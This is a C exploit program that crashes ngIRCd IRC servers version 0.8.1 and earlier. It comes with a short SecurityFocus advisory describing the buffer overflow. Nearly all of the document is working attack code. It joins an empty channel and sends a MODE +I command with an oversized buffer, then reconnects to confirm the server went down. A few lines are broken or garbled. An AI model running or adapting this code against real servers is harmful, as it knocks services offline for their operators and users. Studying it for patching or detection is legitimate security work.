// source: https://www.securityfocus.com/bid/12397/info
ngIRCd is reported prone to a remote buffer overflow vulnerability. This issue presents itself because the application fails to perform proper boundary checks before copying user-supplied data into process buffers.
A successful attack may allow the attacker to crash the server or gain unauthorized access to a vulnerable computer.
ngIRCd 0.8.1 and prior versions are affected by this vulnerability.
/*
NGircd <= 0.8.1 Remote Denial Of Service Coded by: Expanders
Usage: ./ngircd_dos <Host> <Ip> <NickToUse> <ChannellToJoin>
NOTE: The channel must be EMPTY to let the exploit use +I mode
Example:
*/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
void help(char *program_name);
int main(int argc, char *argv[]) {
struct sockaddr_in trg;
struct hostent *he;
long addr;
int sockfd, buff,rc;
char evilbuf[1024];
char buffer[1024];
char *nick="AntiServer";
char *channel="Die_NGircd";
char *request;
if(argv[3] != NULL) nick=argv[3];
if(argv[4] != NULL) channel=argv[4];
if(argc < 3 ) {
help(argv[0]);
exit(0);
}
printf("\n\n-=[ NGircd <= 0.8.1 Remote DoS ::: Coded by Expanders ]=-\n");
he = gethostbyname(argv[1]);
sockfd = socket(AF_INET, SOCK_STREAM, 0);
request = (char *) malloc(12344);
trg.sin_family = AF_INET;
trg.sin_port = htons(atoi(argv[2]));
trg.sin_addr = *((struct in_addr *) he->h_addr);
memset(&(trg.sin_zero), '\0', 8);
printf("\n\nConnecting to target \t...");
rc=connect(sockfd, (struct sockaddr *)&trg, sizeof(struct sockaddr_in));
if(rc==0)
{
printf("[Done]\nBuilding evil buffer\t...");
memset(evilbuf,65,300);
memset(evilbuf+300,64,1);
memset(evilbuf+301,65,128);
printf("[Done]\nSending NICK \t...");
sprintf(request,"NICK %s\n",nick);
send(sockfd,request,strlen(request),0);
printf("[Done]\nSending USER \t...");
sprintf(request,"USER %s x0n3-h4ck.org eth0.x0n3-h4ck.org
:%s\n",nick,nick);
send(sockfd,request,strlen(request),0);
buff=recv(sockfd, buffer, 256, 0);
printf("[Done]\nJoining Channel \t...");
sprintf(request,"JOIN #%s\n",channel);
send(sockfd,request,strlen(request),0);
printf("[Done]\nSending evil request \t...");
sprintf(request,"MODE #%s +I %s\n",channel,evilbuf);
send(sockfd,request,strlen(request),0);
sprintf(request,"QUIT www.x0n3-h4ck.org\n",evilbuf);
send(sockfd,request,strlen(request),0);
sleep(2);
printf("[Done]\nTrying to reconnect\t...");
close(sockfd);
sockfd = socket(AF_INET, SOCK_STREAM, 0);
sleep(1);
rc=connect(sockfd, (struct sockaddr *)&trg, sizeof(struct sockaddr_in));
if(rc==0)
printf("[Fail] -> Damn! Attack Failed!\n\n");
else
printf("[Done] -> Attack Success! Lets party!\n\n");
}
else
printf("[Fail] -> Unable to connect\n\n");
close(sockfd);
return 0;
}
void help(char *program_name) {
printf("\n\t-=[ NGircd <= 0.8.1 Remote Denial Of Service ]=-\n");
printf("\t-=[ ]=-\n");
printf("\t-=[ Coded by
ders -/www.x0n3-h4ck.org\\- ]=-\n\n");
printf("Usage: %s <Host> <Ip> <NickToUse>
<ChannellToJoin>\n",program_name);
}
